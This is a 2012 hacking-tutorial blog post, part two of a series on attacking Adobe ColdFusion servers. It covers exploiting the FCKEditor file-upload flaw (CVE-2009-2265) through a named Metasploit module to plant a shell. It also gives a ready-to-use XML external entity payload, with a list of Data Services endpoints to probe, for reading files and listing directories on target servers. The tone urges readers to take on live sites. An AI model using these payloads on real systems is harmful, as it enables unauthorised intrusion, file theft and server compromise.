Thursday, November 29, 2012

Hacking Cold Fusion Servers - Part II

Now I will go over two more additional vulnerabilities which can be potentially leveraged to attack Cold Fusion Servers. This time we will be looking at exploiting a weak uploader as well as another LFD/LFI vulnerability but with small twist. If you didn't catch the first part then I encourage you to read that thread before reading this one as it makes for better attack flow in general this way. Assuming your all set, let's begin....

Now one thing to be aware of is that Cold Fusion packed an FCKEditor in with v8 when it was first released and they didn't due proper checking on the upload types. If you give it a file as .txt but write to .cfm or .jsp it thinks this is ok! This exploit will take some coding abilities on your behalf or the ability to use Metasploit as it has a nice pre-built exploit for this one (Java Meterpreter works best for payload). You basically shoot and point with MSF and hope for the best. If the uploader is present it will try to send a multi-part upload request via POST. If successful you should be able to find a shell in '/userfiles/file/' directory of the site. Now I have coded my own script for this and tried with Metasploit but have not successfully exploited this myself so not going to post my code just yet, would like to confirm it first. You have MSF as a crutch for now, can find the module by referencing CVE-2009-2265, or just type 'use exploit/windows/http/coldfusion_fckeditor'; I will update this section when I have confirmation of working code on my part.....

 OK, so in addition to the previously shown LFD/LFI to RCE vulneranility we demonstrated in part I of this series, there is another LFD/LFI vulnerability. This time it is XML External Entities (XEE) Injection in the Data Services which allows a wide range of XML based attacks, including Local File Disclosure, TCP scans and Denial of Service condition, which can be achieved by recursive entity injection, attribute blow up and other types of injection. For more information about the implications associated to this vulnerability, refer to the RFC2518 (17.7 Implications of XML External Entities): I will show you how we can exploit this to map out the target server and read files. Basically we send a carefully crafted XML request to the Data Service file handler and if it is vulnerable to XEE Injection it will spit back the results we ask for. Here are some common files to check:
  • /flex2gateway/
  • /flex2gateway/http
  • /flex2gateway/httpsecure
  • /flex2gateway/cfamfpolling
  • /flex2gateway/amf
  • /flex2gateway/amfpolling
  • /messagebroker/http
  • /messagebroker/httpsecure
  • /blazeds/messagebroker/http
  • /blazeds/messagebroker/httpsecure
  • /samples/messagebroker/http
  • /samples/messagebroker/httpsecure
  • /lcds/messagebroker/http
  • /lcds/messagebroker/httpsecure
  • /lcds-samples/messagebroker/http
  • /lcds-samples/messagebroker/httpsecure
You can accomplish this with Hackbar add-on in Firefox easily enough, Burp or Netcat is just as easy. Essentially we can use the below XML Code as a framework for our file injection and enumeration, simply pass it as POST data to the vulnerable Data Service:
"<?xml version="1.0" encoding="utf-8"?><!DOCTYPE test [ <!ENTITY x3 SYSTEM "<INSERT_PATH/FILE_HERE>"> ]><amfx ver="3" xmlns=""><body><object type="flex.messaging.messages.CommandMessage"><traits><string>body</string><string>clientId</string><string>correlationId</string><string>destination</string><string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string><string>timeToLive</string></traits><object><traits /></object><null /><string /><string /><object><traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string><int>1</int></object><string>&x3;</string><int>5</int><int>0</int><int>0</int></object></body></amfx>"
Simply replace '<INSERT_PATH/FILE_HERE>' with the path to read an let the requests rip, like so:

Now the cool thing here is that it works regardless of OS, since it is due to how the Data Services are handling and parsing the XML data being passed, just make sure you request the proper file type for designated system type (check server response if you have no idea)...

Also in addition to reading files, you can simply pass a directory and it will spit back the directory content, making it very easy to map things out and find files worth reading. Now limited privileges may restrict some file reading but still plenty enough to cause trouble, enumerate lots of info, and possibly even read the site configuration details...

In addition to these named exploits in this Cold Fusion series, the same old usual suspects are still fair game here. SQL injection vulnerabilities just as common as on PHP or ASP based sites, and 'cfincludes' can enable source disclosures. In many cases the db can be compromised and Java commands maybe leveraged to further extend the potential attack vectors and escalation platform from that of a standard injection so keep your eyes out and don’t be afraid to take on a new site just cause it has .CFM or .JSP files instead of the oh so popular .PHP or .ASP. Hope you enjoyed this short series on hacking Cold Fusion Servers. All material for the series was available on the net in various places, all I did was wrap it up for you and try to make it a little easier to understand. If you have any questions or suggestions please post em here or let me know via PM.

Until next time, Enjoy!